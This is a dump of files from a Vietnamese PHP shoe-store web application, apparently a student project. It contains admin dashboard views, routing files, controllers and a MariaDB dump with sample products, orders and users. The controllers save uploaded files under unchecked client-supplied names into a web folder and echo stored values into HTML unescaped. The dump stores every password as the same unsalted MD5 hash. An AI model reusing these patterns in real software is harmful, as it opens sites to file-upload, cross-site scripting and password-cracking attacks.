- Tổng thu<span style="color: orange"> <?php echo $tongthu1 . '.000 VND'; ?> </span>
</div>
</div>
<div class="col-sm-4">
<div class="div1">
Doanh thu Tháng <?php echo $loai_thang; ?><br>
- Có <?php $dem1 = 0;
$tongthu1 = 0;
foreach ($thongke_hoadon_thang as $key => $value) {
$dem1++;
$tongthu1 += $value['tongtien'];
} ?>
<span style="color: orange"><?php echo $dem1; ?></span> hóa đơn<br>
- Tổng thu <span style="color: orange"><?php echo $tongthu1 . '.000 VND'; ?></span>
</div>
</div>
<div class="col-sm-4">
<div class="div1">
Doanh thu Năm <?php echo $loai_nam; ?><br>
- Có <?php $dem1 = 0;
$tongthu1 = 0;
foreach ($thongke_hoadon_nam as $key => $value) {
$dem1++;
$tongthu1 += $value['tongtien'];
} ?>
<span style="color: orange"><?php echo $dem1; ?></span> hóa đơn<br>
- Tổng thu <span style="color: orange"><?php echo $tongthu1 . '.000 VND'; ?></span>
</div>
</div>
<div class="col-sm-4">
<div class="div1">
<?php
$sum_user = 0;
foreach ($data_user as $value) {
$sum_user += 1;
}
echo "Tổng tài khoản là: " . "<br><span style='color:orange;'> $sum_user</span>";
?>
</div>
</div>
<div class="col-sm-4">
<div class="div1">
<?php
$sum_sanpham = 0;
foreach ($data_sanpham as $value) {
$sum_sanpham += 1;
}
echo "Tổng sản phẩm là: " . "<br><span style='color:orange;'>$sum_sanpham</span>";
?>
</div>
</div>
<div class="col-sm-4">
<div class="div1">
<?php
$sum_loaisanpham = 0;
foreach ($data_loaisanpham as $value) {
$sum_loaisanpham += 1;
}
echo "Tổng Loại sản phẩm là: " . "<br><span style='color:orange;'>$sum_loaisanpham</span>";
?>
</div>
</div>
<div class="col-sm-4">
<div class="div1">
<?php
$sum_hoadon = 0;
foreach ($data_hoadon as $value) {
$sum_hoadon += 1;
}
echo "Tổng hóa đơn là: " . "<br><span style='color:orange;'>$sum_hoadon</span>";
?>
</div>
</div>
<div class="col-sm-4">
<div class="div1">
<?php
$sum_banner = 0;
foreach ($data_banner as $value) {
$sum_banner += 1;
}
echo "Tổng banner là: " . "<br><span style='color:orange;'>$sum_banner</span>";
?>
</div>
</div>
<div class="col-sm-4">
<div class="div1">
<?php
$sum_khuyenmai = 0;
foreach ($data_khuyenmai as $value) {
$sum_khuyenmai += 1;
}
echo "Tổng các khuyến mãi là: " . "<br><span style='color:orange;'>$sum_khuyenmai</span>";
?>
</div>
</div>
</div>
</div>
<?php if ($_SESSION['admin'] == true) { ?>
<div class="col-sm-12">
<!-- <a href="?action=xoalayout" class="pull-right">Reset data layout</a> -->
<button onclick="myFunction()"><a href="#sualayout">Chỉnh sửa thông tin cửa hàng</a></button>
<p><br><br></p>
</div>
<?php } else {
} ?>
<div id="myDIV" hidden>
<div class="col-md-12">
<div class="panel panel-primary">
<div class="container">
<div class="col-sm-12" style="background-color: lightgray;">
<div class="panel-body">
<form method="POST" action="?action=sualayout" enctype="multipart/form-data">
<h3 style="margin: 30px;"><span id="sualayout">Footer</span></h3>
<?php
foreach ($data_layout as $value) { ?>
<!-- rows -->
<div class="row" style="margin-top:25px;">
<div class="col-md-2">Gmail</div>
<div class="col-md-10">
<input style="margin-left:30px" name="mail" size="70" type="text" value="<?php echo $value['mail'] ?>" required>
</div>
</div>
<div class="row" style="margin-top:25px;">
<div class="col-md-2"> Địa chỉ</div>
<div class="col-md-10">
<input style="margin-left:30px" name="diachi" size="70" type="text" value="<?php echo $value['diachi'] ?>" required>
</div>
</div>
<div class="row" style="margin-top:25px;">
<div class="col-md-2">Số điện thọai</div>
<div class="col-md-10">
+84 <input name="phone" size="70" type="text" value="<?php echo $value['phone'] ?>" required>
</div>
</div>
<div class="row" style="margin-top:25px;">
<div class="col-md-2"></div>
<div class="col-md-10">
<button type="submit" name="create" class="btn btn-primary">Thêm</button>
</div>
</div>
<!-- end rows -->
</form>
</div>
<?php } ?>
</form>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- </div> -->
<script>
function myFunction() {
var x = document.getElementById("myDIV");
if (x.style.display === "block") {
x.style.display = "none";
} else {
x.style.display = "block";
}
}
</script><file_sep>/admin/views_admin/dieuhuong.php
<?php
$action = isset($_GET['action']) ? $_GET['action'] : "trangchu"; // $_GET[''] lấy thông tin trên thanh địa chỉ
switch ($action) {
case 'trangchu':
require_once('trangchu/trangchu.php');
break;
case 'taikhoan':
require_once('taikhoan/Quanlytaikhoan.php');
break;
case 'loaisanpham':
require_once('loaisanpham/quanlyloaisanpham.php');
break;
// case 'danhmuc':
// require_once('danhmuc/quanlydanhmuc.php');
// break;
// database user ,liên quan tới tài khoản người dùng
case 'xemnguoidung':
require_once('taikhoan/xem.php');
break;
case 'edit':
require_once('taikhoan/sua.php');
break;
case 'them_giaodien':
require_once('taikhoan/them.php');
break;
// database sanpham, liên quan tới sản phẩm và loại sản phẩm
case 'sanpham':
require_once('sanpham/quanlysanpham.php');
break;
case 'xemsanpham':
require_once('sanpham/xem.php');
break;
case 'suasanpham':
require_once('sanpham/sua.php');
break;
case 'them_sanpham_giaodien':
require_once('sanpham/them.php');
break;
case 'them_soluong_giaodien':
require_once('sanpham/them_soluong.php');
break;
// loại sản phẩm
case 'loaisanpham':
require_once('loaisanpham/quanlyloaisanpham.php');
break;
case 'xemloaisanpham':
require_once('loaisanpham/xem.php');
break;
case 'sualoaisanpham':
require_once('loaisanpham/sua.php');
break;
case 'themloaisanpham_giaodien':
require_once('loaisanpham/them.php');
break;
// hóa đơn
case 'hoadon':
require_once('hoadon/quanlyhoadon.php');
break;
case 'xemhoadon':
require_once('hoadon/xem.php');
break;
//banner
case 'banner':
require_once('banner/quanlybanner.php');
break;
case 'suabanner':
require_once('banner/sua.php');
break;
case 'thembanner_giaodien':
require_once('banner/them.php');
break;
//khuyến mãi
case 'khuyenmai':
require_once('khuyenmai/quanlykhuyenmai.php');
break;
case 'suakhuyenmai_giaodien':
require_once('khuyenmai/sua.php');
break;
case 'themkhuyenmai_giaodien':
require_once('khuyenmai/them.php');
break;
case 'xemkhuyenmai':
require_once('khuyenmai/xem.php');
break;
default:
require_once('trangchu/trangchu.php');
break;
}
?><file_sep>/controller/chitietmathang_controller.php
<?php
// require_once('views/index.php'); gọi câu mới xuất hiện giao diện được
require_once('./model/hang.php');
/**
*
*/
class chitietmathang
{
var $chitietmathang_controller;
function __construct()
{
$this->chitietmathang_controller = new mathang();
}
public function chitiet_hang()
{
$id = isset($_GET['id']) ? $_GET['id'] : '1';
$data_chitiet = $this->chitietmathang_controller->details_hang($id);
$data_loaisanpham = $this->chitietmathang_controller->loaisanpham();
$ten_color = $this->chitietmathang_controller->getcolor($id);
$size = $this->chitietmathang_controller->getsize($id);
$idLoaiSP = isset($_GET['idLoaiSP']) ? $_GET['idLoaiSP'] : '1';
$data_sanphamlienquan = $this->chitietmathang_controller->sanphamlienquan($idLoaiSP);
$ten_loaisanpham = $this->chitietmathang_controller->layten_loaisanpham($idLoaiSP);
$xem_gopy = $this->chitietmathang_controller->xem_gopy();
require_once('views/index.php');
}
public function gopy()
{
$idSP = $_GET['id'];
$email = filter_input(INPUT_POST, 'email_gopy');
$noidung = filter_input(INPUT_POST, 'noidung_gopy');
$this->chitietmathang_controller->them_gopy($idSP, $email, $noidung);
echo "<script language='javascript'>location.href='?action=chitietmathang&id=".$idSP."';</script>";
}
}
?><file_sep>/views/dieuhuong.php
<?php
$action = isset($_GET['action']) ? $_GET['action'] : "trangchu"; // $_GET[''] lấy thông tin trên thanh địa chỉ
switch ($action) {
case 'trangchu':
require_once('home/home.php');
break;
case 'cuahang':
require_once('cuahang/cuahang.php');
break;
case 'cuahang1':
require_once('cuahang/cuahang.php');
break;
// chỗ đăng nhập
case 'taikhoan':
require_once('taikhoannguoidung/taikhoannguoidung.php');
break;
// chỗ cửa hàng
case 'luachon':
require_once('cuahang/cuahang.php');
break;
case 'gioithieu':
require_once('gioithieu/gioithieu.php');
break;
case 'dangnhap':
require_once('dangnhap/dangnhap.php');
break;
case 'dangky':
require_once('dangnhap/dangky.php');
break;
case 'giohang':
require_once('giohang/giohang.php');
# code...
break;
case 'chitietmathang':
require_once('chitietmathang/chitietmathang.php');
require_once('sanphamlienquan/sanphamlienquan.php');
# code...
break;
case 'giohang':
require_once('giohang/giohang.php');
# code...
break;
case 'quenmatkhau':
require_once('dangnhap/quenmk.php');
# code...
break;
case 'laymatkhau_submit':
require_once('dangnhap/quenmk.php');
# code...
break;
case 'thanhtoan':
require_once('thanhtoan/thanhtoan.php');
# code...
break;
case 'hoanthanhdonhang':
require_once('hoanthanhdonhang/hoanthanhdonhang.php');
# code...
break;
default:
# code...
break;
}
<file_sep>/admin/controller_admin/quanlysanpham.php
<?php
// CONTROLLER D<NAME>I CÁC HÀM TRONG MODEL
require_once('./model_admin/sanpham.php'); // đã gọi được rồi
require_once('./model_admin/loaisanpham.php');
/**
*
*/
class sanphamcontroller
{
var $sanpham_model;
var $loaisanpham_model;
public function __construct()
{
$this->sanpham_model = new sanpham();
$this->loaisanpham_model = new loaisanpham();
}
public function list() // hàm hiển thị tất cả sản phẩm trong database
{
$gioihan = 2;
$trang = isset($_GET['trang'])? $_GET['trang'] : '1';
$batdau = ($trang-1) * $gioihan;
$sodong = mysqli_num_rows($this->sanpham_model->phantrang());
$tongsotrang = $sodong/$gioihan;
$dataCate = $this->loaisanpham_model->allCate();
if(isset($_POST['timkiem_sp'])){
$timkiem_sp = $_POST['timkiem_sp'];
$data = $this->sanpham_model->timkiem_sp($timkiem_sp, $batdau, $gioihan);
}else{
$data = $this->sanpham_model->all($batdau, $gioihan);
}
require_once('views_admin/index.php');
}
function them_giaodien()
{
$data_km = $this->sanpham_model->khuyenmai();
$data_mau = $this->sanpham_model->mau();
$data_size = $this->sanpham_model->size();
$data_lsp = $this->sanpham_model->loaisp();
$dataCate = $this->loaisanpham_model->allCate();
require_once('views_admin/index.php');
}
public function details() // hàm hiển thị chi tiết thông tin của một sản phẩm được chọn bởi $id
{
$data_km = $this->sanpham_model->khuyenmai();
$data_mau = $this->sanpham_model->mau();
$data_size = $this->sanpham_model->size();
$data_lsp = $this->sanpham_model->loaisp();
$id = isset($_GET['id']) ? $_GET['id'] : '1';
$data = $this->sanpham_model->find($id);
require_once('views_admin/index.php');
}
public function update()
{
$idSP = filter_input(INPUT_POST, 'idSP');
$idKM = filter_input(INPUT_POST, 'idKM');
$idLoaiSP = filter_input(INPUT_POST, 'idLoaiSP');
$idcolor = filter_input(INPUT_POST, 'idmau');
$idsize = filter_input(INPUT_POST, 'idsize');
$tenSP = filter_input(INPUT_POST, 'tenSP');
$Dongia =filter_input(INPUT_POST, 'Dongia');
$anh1 = $_FILES['anh1']['name'];
$anh1_tmp = $_FILES['anh1']['tmp_name'];
move_uploaded_file($anh1_tmp, './public_admin/image/sanpham/'.$anh1);
$anh2 = $_FILES['anh2']['name'];
$anh2_tmp = $_FILES['anh2']['tmp_name'];
move_uploaded_file($anh2_tmp, './public_admin/image/sanpham/'.$anh2);
$anh3 = $_FILES['anh3']['name'];
$anh3_tmp = $_FILES['anh3']['tmp_name'];
move_uploaded_file($anh3_tmp, './public_admin/image/sanpham/'.$anh3);
$ngaynhap =filter_input(INPUT_POST, 'ngaynhap');
$mota =filter_input(INPUT_POST, 'mota');
$soluong =filter_input(INPUT_POST, 'soluong');
$this->sanpham_model->update($idSP, $idKM, $idLoaiSP, $idcolor, $idsize, $tenSP, $Dongia, $anh1, $anh2, $anh3, $ngaynhap, $mota, $soluong);
}
public function them()
{
$idLoaiSP =filter_input(INPUT_POST, 'idLoaiSP');
$idKM =filter_input(INPUT_POST, 'idKM');
$idcolor =filter_input(INPUT_POST, 'idmau');
$idsize =filter_input(INPUT_POST, 'idsize');
$tenSP = filter_input(INPUT_POST, 'tenSP');
$Dongia =filter_input(INPUT_POST, 'Dongia');
// lấy ảnh
$anh1 = $_FILES['anh1']['name'];
$anh1_tmp = $_FILES['anh1']['tmp_name'];
move_uploaded_file($anh1_tmp, './public_admin/image/sanpham/'.$anh1);
$anh2 = $_FILES['anh2']['name'];
$anh2_tmp = $_FILES['anh2']['tmp_name'];
move_uploaded_file($anh2_tmp, './public_admin/image/sanpham/'.$anh2);
$anh3 = $_FILES['anh3']['name'];
$anh3_tmp = $_FILES['anh3']['tmp_name'];
move_uploaded_file($anh3_tmp, './public_admin/image/sanpham/'.$anh3);
$ngaynhap =filter_input(INPUT_POST, 'ngaynhap');
$mota =filter_input(INPUT_POST, 'mota');
$soluong =filter_input(INPUT_POST, 'soluong');
// // thêm mà nếu trùng tên, màu, size sản phẩm thì cộng thêm vào số lượng
$datasanpham_all = $this->sanpham_model->all_them();
$soluong_them = 0;
foreach ($datasanpham_all as $key => $value) {
if($value['idsize'] == $idsize && $value['idcolor'] == $idcolor && $value['Dongia'] == $Dongia && $value['tenSP'] == $tenSP){
$idSP=$value['idSP'];
$soluong_them = $value['soluong'] + $soluong;
return $this->sanpham_model->insert_trung($idSP, $soluong_them);
}
}
$this->sanpham_model->insert($idKM, $idLoaiSP, $idcolor, $idsize, $tenSP, $Dongia, $anh1, $anh2, $anh3, $ngaynhap, $mota, $soluong);
//
}
public function xoasanpham()
{
$id = isset($_GET['id']) ? $_GET['id'] : '1';
$this->sanpham_model->delete($id);
}
function them_soluong_giaodien()
{
$data_km = $this->sanpham_model->khuyenmai();
$data_mau = $this->sanpham_model->mau();
$data_size = $this->sanpham_model->size();
$data_lsp = $this->sanpham_model->loaisp();
// chỗ này đê thêm số lượng
$idSP = $_GET['idSP'];
$soluong_sanpham = $_GET['soluong'];
require_once('views_admin/index.php');
}
public function them_soluong()
{
$soluong_them = filter_input(INPUT_POST, 'soluong_them');
$soluong_sanpham = filter_input(INPUT_POST, 'soluong_sanpham');
$soluong_tong = $soluong_them + $soluong_sanpham;
$idSP = filter_input(INPUT_POST, 'idSP');
$this->sanpham_model->them_soluong($idSP, $soluong_tong);
}
}
?><file_sep>/shoe_store.sql
-- phpMyAdmin SQL Dump
-- version 4.9.1
-- https://www.phpmyadmin.net/
--
-- Máy chủ: 127.0.0.1
-- Thời gian đã tạo: Th1 11, 2021 lúc 03:48 AM
-- Phiên bản máy phục vụ: 10.4.8-MariaDB
-- Phiên bản PHP: 7.2.24
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET AUTOCOMMIT = 0;
START TRANSACTION;
SET time_zone = "+00:00";
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
--
-- Cơ sở dữ liệu: `shoe_store`
--
-- --------------------------------------------------------
--
-- Cấu trúc bảng cho bảng `banner`
--
CREATE TABLE `banner` (
`idbanner` int(11) NOT NULL,
`anh` varchar(255) COLLATE utf8_unicode_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
--
-- Đang đổ dữ liệu cho bảng `banner`
--
INSERT INTO `banner` (`idbanner`, `anh`) VALUES
(1, 'banner1.jpg'),
(2, 'banner2.jpg'),
(3, 'logo.png');
-- --------------------------------------------------------
--
-- Cấu trúc bảng cho bảng `color`
--
CREATE TABLE `color` (
`idcolor` int(11) NOT NULL,
`color` varchar(255) COLLATE utf8_unicode_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
--
-- Đang đổ dữ liệu cho bảng `color`
--
INSERT INTO `color` (`idcolor`, `color`) VALUES
(1, 'đỏ'),
(2, 'vàng'),
(3, 'đen'),
(4, 'xám'),
(5, 'xanh'),
(6, 'nâu'),
(7, 'cam'),
(8, 'trắng'),
(9, 'hồng');
-- --------------------------------------------------------
--
-- Cấu trúc bảng cho bảng `gopy`
--
CREATE TABLE `gopy` (
`idgopy` int(11) NOT NULL,
`idSP` int(11) NOT NULL,
`email` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`noidung` varchar(255) COLLATE utf8_unicode_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
--
-- Đang đổ dữ liệu cho bảng `gopy`
--
INSERT INTO `gopy` (`idgopy`, `idSP`, `email`, `noidung`) VALUES
(1, 1, '<EMAIL>', 'GIÀY TÂY NAM CÔNG SỞ DA'),
(2, 1, '<EMAIL>', 'giày đẹp thiệt'),
(3, 9, '<EMAIL>', 'GIày này cũng ổn'),
(4, 9, '<EMAIL>', 'Giày công sở 2 này đẹp và bền'),
(5, 2, '<EMAIL>', 'Giày này cho học sinh có phù hợp không?'),
(6, 5, '<EMAIL>', 'Giày học ính nam này đẹp, bền '),
(7, 6, '<EMAIL>', 'Giày bền, đẹp và rất đáng tiền'),
(8, 4, '<EMAIL>', 'Giày da bò này là da thiệt nè'),
(9, 3, '<EMAIL>', 'Giày này hợp thời trang này'),
(10, 7, '<EMAIL>', 'GIÀY THỜI TRANG này đẹp và bền á ad'),
(11, 8, '<EMAIL>', 'Loại giày này hợp với mình nè');
-- --------------------------------------------------------
--
-- Cấu trúc bảng cho bảng `hoadon`
--
CREATE TABLE `hoadon` (
`idhoadon` int(11) NOT NULL,
`idUser` int(11) NOT NULL,
`idSP` int(11) NOT NULL,
`tongtien` int(11) NOT NULL,
`trangthai` int(11) NOT NULL,
`soluongmua` int(11) NOT NULL,
`ngaymua` date NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
--
-- Đang đổ dữ liệu cho bảng `hoadon`
--
INSERT INTO `hoadon` (`idhoadon`, `idUser`, `idSP`, `tongtien`, `trangthai`, `soluongmua`, `ngaymua`) VALUES
(2, 1, 2, 600, 1, 3, '2020-12-31'),
(4, 1, 7, 700, 1, 2, '2020-12-31'),
(6, 1, 4, 790, 1, 1, '2020-11-25'),
(7, 1, 2, 400, 1, 2, '2021-01-01'),
(8, 1, 4, 790, 1, 1, '2021-01-06'),
(9, 1, 8, 950, 1, 1, '2021-01-09'),
(18, 6, 3, 150, 1, 1, '2021-01-11'),
(19, 1, 3, 150, 1, 1, '2021-01-11');
-- --------------------------------------------------------
--
-- Cấu trúc bảng cho bảng `khuyenmai`
--
CREATE TABLE `khuyenmai` (
`idKM` int(11) NOT NULL,
`loaiKM` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`giatriKM` float NOT NULL,
`ngaybatdau` date NOT NULL,
`ngayketthuc` date NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
--
-- Đang đổ dữ liệu cho bảng `khuyenmai`
--
INSERT INTO `khuyenmai` (`idKM`, `loaiKM`, `giatriKM`, `ngaybatdau`, `ngayketthuc`) VALUES
(1, 'Không', 0, '0000-00-00', '0000-00-00'),
(2, 'Sản phẩm mới', 30, '0000-00-00', '0000-00-00'),
(3, 'Khuyến mãi đầu năm', 30, '0000-00-00', '0000-00-00'),
(4, 'Khuyến mãi cuối năm', 30, '0000-00-00', '0000-00-00'),
(5, 'Khuyến mãi theo dịch vu', 30, '0000-00-00', '0000-00-00');
-- --------------------------------------------------------
--
-- Cấu trúc bảng cho bảng `layout`
--
CREATE TABLE `layout` (
`id` int(11) NOT NULL,
`time` varchar(10) COLLATE utf8_unicode_ci NOT NULL,
`mail_1` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`mail_2` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`diachi` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`donvi` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`phone_1` double NOT NULL,
`phone_2` double NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
--
-- Đang đổ dữ liệu cho bảng `layout`
--
INSERT INTO `layout` (`id`, `time`, `mail_1`, `mail_2`, `diachi`, `donvi`, `phone_1`, `phone_2`) VALUES
(1, '24/7', '<EMAIL>', '<EMAIL>', 'Làng Đại học, Đà Nẵng', 'Khoa Công Nghệ Thông Tin & Truyền Thông - Đại Học Đà Nẵng VKU', 787700624, 123456789);
-- --------------------------------------------------------
--
-- Cấu trúc bảng cho bảng `loaisanpham`
--
CREATE TABLE `loaisanpham` (
`idLoaiSP` int(11) NOT NULL,
`tenLSP` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`hinhanh` varchar(255) COLLATE utf8_unicode_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
--
-- Đang đổ dữ liệu cho bảng `loaisanpham`
--
INSERT INTO `loaisanpham` (`idLoaiSP`, `tenLSP`, `hinhanh`) VALUES
(1, 'Giày công sở', 'giaycongso.jpg'),
(2, 'Giày học sinh', 'giayhs2.jpg'),
(3, 'Giày da bò', 'giaydabo.jpg'),
(4, 'Giày thời trang nam', 'giaythoitrang2.jpg');
-- --------------------------------------------------------
--
-- Cấu trúc bảng cho bảng `phanquyen`
--
CREATE TABLE `phanquyen` (
`idQuyen` int(11) NOT NULL,
`tenquyen` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`chitietquyen` varchar(255) COLLATE utf8_unicode_ci NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
--
-- Đang đổ dữ liệu cho bảng `phanquyen`
--
INSERT INTO `phanquyen` (`idQuyen`, `tenquyen`, `chitietquyen`) VALUES
(1, 'admin', 'quản lý trang web'),
(0, 'customer', 'khách hàng quen'),
(2, 'banhang', 'Nhân viên bán hàng');
-- --------------------------------------------------------
--
-- Cấu trúc bảng cho bảng `sanpham`
--
CREATE TABLE `sanpham` (
`idSP` int(11) NOT NULL,
`idKM` int(11) NOT NULL,
`idLoaiSP` int(11) NOT NULL,
`idcolor` int(11) NOT NULL,
`idsize` int(11) NOT NULL,
`tenSP` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`Dongia` int(11) NOT NULL,
`anh1` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`anh2` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`anh3` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`ngaynhap` date NOT NULL,
`mota` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`soluong` int(255) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
--
-- Đang đổ dữ liệu cho bảng `sanpham`
--
INSERT INTO `sanpham` (`idSP`, `idKM`, `idLoaiSP`, `idcolor`, `idsize`, `tenSP`, `Dongia`, `anh1`, `anh2`, `anh3`, `ngaynhap`, `mota`, `soluong`) VALUES
(1, 2, 1, 1, 5, 'Giày Tây Nam Công Sở Da', 130, 'Giày Tây Nam Công Sở Da1.jpg', 'Giày Tây Nam Công Sở Da2.jpg', 'Giày Tây Nam Công Sở Da3.jpg', '2020-12-15', '<p>Form giày ôm chân, thiết kế phù hợp với mọi độ tuổi<br />Chất liệu: Da tổng hợp cao cấp, đẹp và bền.<br />Phần đế thiết kế thời trang hiện đại, rãnh chống trơn đặc biệt<br />Đường chỉ may tỉ mỉ, tinh tế<br />Phối', 9),
(2, 1, 2, 2, 6, 'giày học sinh1', 200, 'Giày học sinh1.jpg', 'Giày học sinh11.jpg', 'Giày học sinh12.jpg', '2020-12-16', '<p>Với thiết kế vải cavans rất ôm chân và phần đế boost mềm mại ♥ Phù hợp cho đi học, tập gym, đi chơi,.v. v. V. ♥ các bạn bấm mua ngay để xem có size của mình không nhá ♥ ng', 46),
(3, 1, 4, 3, 7, '<NAME>11', 150, 'giaythoitrang1.jpeg', 'giaythoitrang2.jpeg', 'giaythoitrang3.jpeg', '2020-12-15', '<ul><li>Thể thao và thời trang</li><li>Giày vải đế cao su mềm đi êm chân</li><li>Size 39 đến 44</li></ul>', 48),
(4, 1, 3, 4, 8, 'Giày Lười Da Bò QS49', 790, 'giaydabo.jpg', 'giaydabo.jpg', 'giaydabo.jpg', '2020-12-15', '<p>Giày Lười Da Bò QS49</p>', 45),
(5, 1, 2, 5, 9, 'giày học sinh', 900, 'giayhs2.jpg', 'giayhs2.jpg', 'giayhs2.jpg', '2020-12-09', '<p><strong><em>giày học sinh nam đẹp</em></strong></p>', 9),
(6, 2, 2, 2, 2, 'giày học sinh nam đẹp', 650, 'giayhs3.jpg', 'giayhs3.jpg', 'giayhs3.jpg', '2020-12-23', '<p>giày học sinh đẹp, bền.</p>', 50),
(7, 2, 4, 6, 10, 'Giày thời trang', 350, 'giaythoitrang2.jpeg', 'giaythoitrang2.jpeg', 'giaythoitrang2.jpeg', '2020-12-15', '<p>GIày thời trang nam đẹp</p>', 5),
(8, 2, 4, 2, 2, 'Giày thời trang', 950, 'giaythoitrang2.jpg', 'giaythoitrang2.jpg', 'giaythoitrang2.jpg', '2020-12-15', '<p><em><strong>Giày thời trang đẹp và bền</strong></em></p>', 49),
(9, 2, 1, 8, 9, 'Giày công sở 2', 300, 'congso.jpg', 'congso.jpg', 'congso.jpg', '2020-12-15', '<p><strong>Giày công sở nam đẹp nhất</strong></p>', 50),
(21, 1, 3, 3, 11, 'Giày da bò nam đẹp', 500, 'loaisanphamgiaydabo.jpg', 'loaisanphamgiaydabo.jpg', 'loaisanphamgiaydabo.jpg', '2021-01-09', '<p><strong><em>Giày da bò nam đẹp, phù hợp với nam giới, giúp bạn lịch lãm hơn</em></strong></p>', 498);
-- --------------------------------------------------------
--
-- Cấu trúc bảng cho bảng `size`
--
CREATE TABLE `size` (
`idsize` int(11) NOT NULL,
`size` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
--
-- Đang đổ dữ liệu cho bảng `size`
--
INSERT INTO `size` (`idsize`, `size`) VALUES
(1, 25),
(2, 26),
(3, 27),
(4, 28),
(5, 29),
(6, 30),
(7, 31),
(8, 32),
(9, 33),
(10, 34),
(11, 35),
(12, 36),
(13, 37),
(14, 38),
(15, 39),
(16, 40),
(17, 41),
(18, 42),
(19, 43),
(20, 44),
(21, 45);
-- --------------------------------------------------------
--
-- Cấu trúc bảng cho bảng `user`
--
CREATE TABLE `user` (
`idUser` int(11) NOT NULL,
`ho` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`ten` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`email` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`diachi` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`gioitinh` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`sodienthoai` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`tendangnhap` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`matkhau` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
`idQuyen` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
--
-- Đang đổ dữ liệu cho bảng `user`
--
INSERT INTO `user` (`idUser`, `ho`, `ten`, `email`, `diachi`, `gioitinh`, `sodienthoai`, `tendangnhap`, `matkhau`, `idQuyen`) VALUES
(1, 'Quản', '<NAME>', '<EMAIL>', 'đà nẵng', 'Nam', '0787700624', 'admin', '827ccb0eea8a706c4c34a16891f84e7b', 1),
(2, 'abc', 'abc', '<EMAIL>', 'đà nẵng', 'nam', '091208934734', 'abc', '827ccb0eea8a706c4c34a16891f84e7b', 0),
(3, 'bán', 'hàng', '<EMAIL>', 'đà nẵng', 'nam', '091208934734', 'banhang', '827ccb0eea8a706c4c34a16891f84e7b', 2),
(4, 'Mai', 'Nhựt', '<EMAIL>', 'quảng nam', 'nam', '0987765442', 'mainhut', '827ccb0eea8a706c4c34a16891f84e7b', 0),
(5, 'đào', 'nguyên', '<EMAIL>', 'daklak', 'nam', '0987765442', 'daonguyen', '827ccb0eea8a706c4c34a16891f84e7b', 0),
(6, 'tin', 'ngô', '<EMAIL>', '<NAME>', 'nam', '111111111111', 'ngotin', '827ccb0eea8a706c4c34a16891f84e7b', 0);
--
-- Chỉ mục cho các bảng đã đổ
--
--
-- Chỉ mục cho bảng `banner`
--
ALTER TABLE `banner`
ADD PRIMARY KEY (`idbanner`);
--
-- Chỉ mục cho bảng `color`
--
ALTER TABLE `color`
ADD PRIMARY KEY (`idcolor`);
--
-- Chỉ mục cho bảng `gopy`
--
ALTER TABLE `gopy`
ADD PRIMARY KEY (`idgopy`);
--
-- Chỉ mục cho bảng `hoadon`
--
ALTER TABLE `hoadon`
ADD PRIMARY KEY (`idhoadon`),
ADD KEY `sanpham` (`idSP`),
ADD KEY `idUser` (`idUser`);
--
-- Chỉ mục cho bảng `khuyenmai`
--
ALTER TABLE `khuyenmai`
ADD PRIMARY KEY (`idKM`);
--
-- Chỉ mục cho bảng `layout`
--
ALTER TABLE `layout`
ADD PRIMARY KEY (`id`);
--
-- Chỉ mục cho bảng `loaisanpham`
--
ALTER TABLE `loaisanpham`
ADD PRIMARY KEY (`idLoaiSP`);
--
-- Chỉ mục cho bảng `phanquyen`
--
ALTER TABLE `phanquyen`
ADD PRIMARY KEY (`idQuyen`);
--
-- Chỉ mục cho bảng `sanpham`
--
ALTER TABLE `sanpham`
ADD PRIMARY KEY (`idSP`),
ADD KEY `idLoaiSP` (`idLoaiSP`),
ADD KEY `idKM` (`idKM`),
ADD KEY `idcolor` (`idcolor`),
ADD KEY `idsize` (`idsize`);
--
-- Chỉ mục cho bảng `size`
--
ALTER TABLE `size`
ADD PRIMARY KEY (`idsize`);
--
-- Chỉ mục cho bảng `user`
--
ALTER TABLE `user`
ADD PRIMARY KEY (`idUser`),
